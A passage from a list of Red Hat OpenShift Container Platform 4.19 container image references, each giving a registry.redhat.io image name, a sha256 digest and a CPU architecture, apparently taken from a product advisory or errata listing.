"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-controller-manager-rhel9@sha256:249b48b699ef21517d11a3533293184b1524b5907fec00593a98f0581363dc12_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-node-manager-rhel9@sha256:660ad818c22efdd4fb965ded889c7ed08b331cb8d50c145bd4a34e74158f790a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-node-manager-rhel9@sha256:deb01110f819b3534a2bd24b5406c69bcf5011eaebdeec438a31f1cd68f18029_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cluster-api-controllers-rhel9@sha256:255b3979a3a054696f21f437998c892b5738cbbcdc021b0a22752f1d9bb48712_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cluster-api-controllers-rhel9@sha256:d665a06a23572a2bcf3345f9c22b2b9895292e1f43d5532b793a3ea4df0c42c8_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9-operator@sha256:086285dd82aadc71803c847a06a2e0727b4fbb09f07a5bf95979ebc50bb95e82_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9-operator@sha256:0f5c719b22dbba95b6d61db0c63ba8107689a7d61f6944e0d2dc5fa3e693d25e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9@sha256:1452416d5cfd9acae6f0bf60da783ec8cf632784655f4602462cf380cd7fe518_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9@sha256:b13a67c30437a6950f41cdda853305d03ac24809746bdca955782db1c59824b1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-operator-rhel9@sha256:43f58c25df6d439ab60c6a7fd905db92d67678bf55732103069b9d3ce9a6ee1d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-operator-rhel9@sha256:5eca83117e60a69246033c3cedcc2e2962e0f0a6ae6d6d7e3c35546cdc78ce70_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-rhel9@sha256:daddd3f94f513bfce03ea0c5aa406164838aa7bc41c3251b02686fd86da09d7a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-rhel9@sha256:f1a3870617f3e6c0774b5484820351c404cabe3161684c6edf3b81554cf9f1de_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-workload-identity-webhook-rhel9@sha256:4f54884bb854edec3a1a28ba089ddc068edc3ad0677637dd9b033a1c0ff8052c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-workload-identity-webhook-rhel9@sha256:834a2b63a74d7af617155da8f25a36f196b7c16a78154468b1cb88a10fdfa88d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:3f79fe8b748ce5015d5d71ce8da20bbff7241868e87066d1d50083a3ceb91bfe_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:66745a12cf917414d197c589e7e57a62958da4c66d5372e848e40568d8ddfafc_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:900e5ff2f8ea86f0864c6a3cd1707a620427189f5bfffa0bb0ea9a8c0ed85330_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:c029ff100811f13c0ba79c03044e0c6f096567511c336e4d1ecced6e900c2acd_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:37fe6420e98e7d1927492a7a40fd01578cfaf441530b7bf2f85cc7d593d7b097_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:480d7e114879e0c9bcfd62250af7f2f7b4a25e7d4cca65d97c422349fe164334_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:6f49794879ad8a54b4a9ba77661ebdf84cb90a048d1472c1f878c10a9ecc46e6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:77c778debce0cb2eff5f5e66a3db3e30905e0138de3ddc3cd5330d2a79ec2cf9_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:6aef6b3ea8ceb252107d24252c9c155e21d42825343e2a824d869f897a86da4f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:895cb0d9b4715a75c1ffa4539bbd86c14f774e664ab16f5df4bc3e55ef537225_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:99fc0e641a6014bad4027471174578ba22c0a4a99c05b6bca1e8c838bbda0a90_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:aee32f17c4c4aa3deaca4a1884efc7c1a05d4fdadea145b247c4364e9e82086a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:07f2b6c01f22078c6b6eea7916982ebfcf6f992daf0d80af7b18972e6c484868_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:3efbeb0ba231cc16b69a86c43c28aa02b7e773413b361ceaf82c72cb215dc187_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:a212996fe27771f82406dc36d68e07e29ecf975834c3cde6395b35cd259edbe9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:b7f1f48335150e9e3ff89c0c349345f2c7fb6d7cf27793d263cca791d53f260c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:39852b09d2ff95f03cff6f39398c67d30d64366f00a0ca73319d81831b7f6e23_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:6d2dbe2a871324b770da093074a9fcac3aa590896e366354f8202bf80eae70ed_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:9df2c55943c62172a5ab42fcd2309a232a8e455240efeba614e2e70308972764_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:e6aaec6333f15e8aa67ad391f57eb7225007c068947982d18fea6b90d837e6e2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:02c4fe2761b586f29c78d9419f0b90d98bee92b8d4fa47ec77dfe45795fab7fb_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:4b1a4e3c67e3fc5c14a8cb7130eec3ea191f27473942f7afb09b497a30236947_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:a9e099fe57f31d4e86d0edbad9605aae421fbe410d1b7c2f6e7036940ba5e319_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:e3504f1bb6b8b89f4f01ecefc3c8646cbc949d638bfa6db0638476731d9f0e96_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:1cdfe759fe6d9b1745276957b712c1a46a69ce1c59706a7ba9ca8f3f89cc844d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:2fafd2b4c0fb8500c0180c767e55f70d26203e68500e64d252fe3a10227a161a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:5a96f6965efd6579efde9b1a1b4ae88b57cbb49f38cf2a39ef90a55470a30667_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:95c126293ef394a5ce8882e8cfa9c6f6c22e9cae79e64e07f0e1e57a8fb55211_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:4e885357cb52fffbb832d31d97400cfc629f26d5c38b4692379d08ba485f46d2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:645168f7cb91679d374bc1e431181a1b964dec279265ec52e5809b368e08654c_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:7c20e19cdbb62a268ffea39d5e0004fb4e6b587c41250c73180043f56b9fe0e5_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:c17396793e30858f900b68ed2981f38062d501b7600a5e4ca127d4e14113aca4_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:56453e8ce0dbb39d0259d2f0b36f58d8f049bf6c1a880b8a1eaa37d8ade32067_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:6513461d1b413d648dc1d2327fac029633f5d34322459f2752d1096648fa37b4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:9a083427c52dcc2f9716408cf23991613eef7c41fb6eb1ee4841491276971039_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:dcfe6ab706950430187a24e9792b6f0c270f813841e799ea7e35623679269ae5_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:334e975b0d8a94ec45ade469bf86809c9a07e9456cda5d5c71d6f91a2877faa0_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:64dfc7beaf3a8cfdab85ba963db74971ca68b6cf614aa04279f4af3239806e4c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:7b99d625b14ced1fd44520bd106906dd60f84e7794257fe3b4d3a3aa685ebbbc_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:8b854d27a269e0f6b6d542f652c504ab0678ac18d1b84db63078257eebe090cf_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:2601add0c23c9e27079274736508adab64c6ae4128f66a53df3f569fe2d9fe3f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:6917cb0e3b073a13ec29e5c329f01cf2ec26e78d47c3c8360d0063d186a4ba53_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:a400d84e7f46869a2c2f75b6f221684879b680910b5e5e4662e074a020483cf4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:d94b765497d2fa316fbf4ec374572a5fba96a99b78dfe02b6ed6986e2b7782e6_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:26b8049bd1a84ed402fad985ca842bf91ba86fbc5e46f7dea0050120ca551643_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:4c28562416c8308c00af299859adfd3cfb4ef790ef2b6668299dc487c6fa3f45_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:645feaaa568676e0c2b1c620a81a1a60d321800b940d46d2514aa59e1f25e2c9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:78bdc6e0ac3da2daf1f39e07c6554ac500deec9670561477f9cf0a346e1145bf_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:59b6c20394bfa15bb36a9ac9b4ef03ae6bdadfcfd110c46fee13ac2abc9f6fa3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:79a30df8b6d7ef52409a3145663550ccf0fbde7e5bffc7e91ccefe2f276e44af_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:9324047c73a33a920fe6403604cd123f81dc7663c4780934f4da3b95f0bb5bac_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:960007197db71f1b34bdeadf7bc13323cff680b273f795dfcffc569867f695b2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:0685735bcfb4c4a112c1796dcfccf10233e0e62e1538520aa6e02abf8dd88c27_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:12bfb2d2bbc5c7bbf8a161f97c1521d0a5c7ef8ad6e3aca825e62cf066a51109_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:d9a9c57749c9d3e56e51d0b67ac5929949a900b1e6c96a4414366afc1ef4ba3b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:f3650443d49b825783ed4f308ff994be4b24c86dee1e2825274d58e0d4b02a28_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:9d90ec3d15ade36e666eee154f9b934259cf811b4a9f987ef18300b78bbe35d3_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:9feb86c7f0170dfae9273fe7e3ba662b7333ce8d05ee411b9e7d9c82447b2f2c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:a1bc835a8621c88b52ddff53d6701b5cefe7cc6f2efb80836c239cb333945043_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:e53bfa8ab4ae569c697bba0b37c25afb495cc6cf324fb4ed50bd8ffc737c04f9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:1264333969e9e7825b6ece8ed3a80a3eeac54564ae51d2aed817e4028fbef931_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:aa2f9d5b3b26615c429128234a5dea3cfa7f4f6d5ce3d9d4e6bf6796bafbb50b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:b2115e5268813615088ca48f0138ff6910b07513be4177cd74485d2d41f0e249_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:c8e791718d7e4a68571b873bd0c68aeffc217fe69ee7e74741ecda295fb67dbd_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:290f5dcc66373ff79cbcda33e6fbba989c48ae2bf8b623c57e065110e36524db_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:572cc6f2f303a9190588696d5bdc80fca9ac3c32d5de9c5d94a27861c871a1c5_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:d1561efe3cc68b60fbfc765e028dee3cf4a7666dc499f028c98603075d99a9d7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:e04cc25c77ffb05e86a6fea6dc8a6e5c35563612305adbcb98cd0b4832c97ed1_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:96fdf677680bf809356060d0af7fc9166608de5dc4d546e671f3071910558381_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:a13951576eb84ab6c6d3b800976320f8bebadad21e49b38faa99e8d1adcc520f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:a8ce501ca7269a42fbb749fd0d3adb03c49468282e1f41e483e569c8acc1f777_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:cd0bb571991f485f4f33aadb8434e1d5e3b6c3bf7ac4e1e62994de0b190b6ec6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:0c5df10c40e0bfbed23f193b9aedaf953a5e1e3f4cbbe5f1924866d1ec7f55cf_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:4cdff720094bd0b07e3dd6ae9b5b88756a890fd1ac39361629c44817766fe69e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:b28fe78ee564e859188499e768d57e3e0fe2ad0afb715b0d76ce0c99960f3cd1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:eb91a50e029bf839ff7be93783acbbd5ea72ba6f3bf9f9dc10c0588c23280f51_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:0ac703dd7441374f349bfeb3639c1a7e364c9764aeb4b9ac05ea7879cce4a5a1_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:4b6155be40a57801b21c44a7b50f89801b15dba8a51dad03969b25bee1a22b6b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:adedcc1ce23f14f3759818cddb9dbbe73dc1f772e3b58e229433f7b6e2f0f5b8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:e81081ad64219f09b1eef538df2903264d087d898aa81bebb6634fe4342efc59_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:5185785b29d581adb9e8ed4e23ba11c7d67090f4c6e59b0287d2a36c83fd8ae1_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:582a1302e53fa201431ccd497816d939ed23590d6d4128cb281a03fcf90f9475_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:5d920d843fb0958a750b86ee532642adc3a77f5e060d54cfa5327e4f41465772_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:cfe7eed06e5855c82c72a26bad2c2354091e94c51b692637cd8e79027ea6742a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:73738cc655778a94527afe3ae48c4ca932590e4f78f03811f70d2d35f5090d3e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:9673f610031257e254dc32e569b3471168e5c18a352ad5bddc9bd51e686eb4e6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:e61ccfe3880e902a0e1cb9e718f62cbf57ce70435092f90f19e441fba2e899d1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:f66818672229085d1982f4b0053c75d26e6faa4893331f6024b33f953426339d_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:1d89f84175f9a72d05074562aeacda38b9047a99974a186a8a4d2d72e20c92f1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:3e6c6be12aadf59c05c9a2da262846e6a44be09351ad81b8891fefa6a3f93f2c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:cf1445e8c39362b8c0b4b29d56771dcdb15f99c71e922e3fddd6b1f7e7b275bc_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:d83d30e35ee380e6003d2ee8b5a56a21ea892037b978273d1ff4a8e1ce88c360_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:2ae0fbcbb1b67e11e64b526fae84e06219478f5ea8e474223525cfd4ebd8a39f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:41acc32b9acd74f09fb1e01b77c0fa3c64a891c96cf2549b54b6e0d43411ffb2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:669266c0b82317a24e2160b8294fd598a8b24f0053e22358e90eaa5fddb527ff_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:dd57d49a58a5111f6d067a3a943c9ac9b5a175972312dd83d5fbd224511c0d99_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:4653cd829513c12b1aa11c156b76a06d1d6dfbcd486a9045f5e58d295ce0a616_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:636cac46aae879046a02123b395762387762e921c02421fbeac623feace69c70_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:8df5c2a7eca23f5a88c99db98340446c2c0d2be2ccf22a62753e955a9da54fd5_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:e0db3311e3862b0fd875d6da134be4cdb3ff6d032591632c35b71aeba2cd6e3d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:30a687482b427b9d447430e0e7ef60e310b9dae5032407b03da36d7795e134c9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:42777662e34fa44925901dd1b8aa9537a389c167557b6287e1b01f13675363cb_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:46a134239b3b4a2792fe663a645b0c5d01a48c7db7d9c0fc71dd50c96d2fbbc4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:7b8211056c73804d6072ec729c67cb6e77042e517009b53a0a420efb1a3893dc_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:0c307a3ef1df661bd3a634fd40ea47de440bf061f2f1631a430b61f6426903c9_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:9ba38f81d114b4fa4e3523ec46ce02bdcd4b5a122d399968bb7d6f8eb8bba271_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:bf98482d9796579be39293dcb59f424e87eff66f1af285ce773cb61b7eb7c7d7_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:fe63945e16c13db6513a214e52c7df6e510806faa3548b5c5658ae4d1c30176b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:48460c041bdffd7940cb9abb2385a6eb9eda698d1155a6e11d948336fb4c81eb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:9c67187eef0b78888e5299143dac7efa69d6c06fa44b9db0a92d4447f7333a0a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:d0fd4fb6c3aada9546a70b24740460db48607ec9333155e04b233b7acf92bde2_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:eb5cee38879cba152e5979d2ec6db64e2cef6bba8dd82cbd18461aa2af072282_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:047391c0706f4f8c7a8c09598ed4d2900c9154cba66f633dc2df220941e978d6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:3344aa2c937d0e7c24f5f7394a50bba34179fa527f9d7492b951f81fce3ac9c4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:9073193ac055f63809d630f43508c41c2fa3bf07d6ca023667fd9fda5daf6117_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:be277357a0ad4546a23c375494eaff76ba1af97f8d77bce6d21ab722d990f749_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:2fc0e9d7cfb095ef01f513ca422a0dbd2b3fa31f8a46b8ed679550d77f3df2fa_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:4b1651037396367c71bfff638a9a8ef32aac4c570389b4d5d95a992d9eb44876_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:4e46a01af9e94831db7732d4747ffa011a3e634792c2076628ba225bce1baafe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:c5093213a910684e94394a0bb9f931c2b62dce522bf1926e0dbf17220d166d3a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:1fc4a052d1a2f71ad6d2bbf61e0a1037f7e2440debd131eace7d32d0fab11cee_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:54ae01b23db949ca63116514359f1d2bd5a7f7d44b3578fc821d432c4da95e68_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:7bb48785d9f7c7fbbdfea41e890259a9d3bc31fa5676bad18d497aa77da498c4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:e3c50d3961173a74abdcd965f0ddf63bca5688a0ae2efece117108cbd0dff616_arm64",
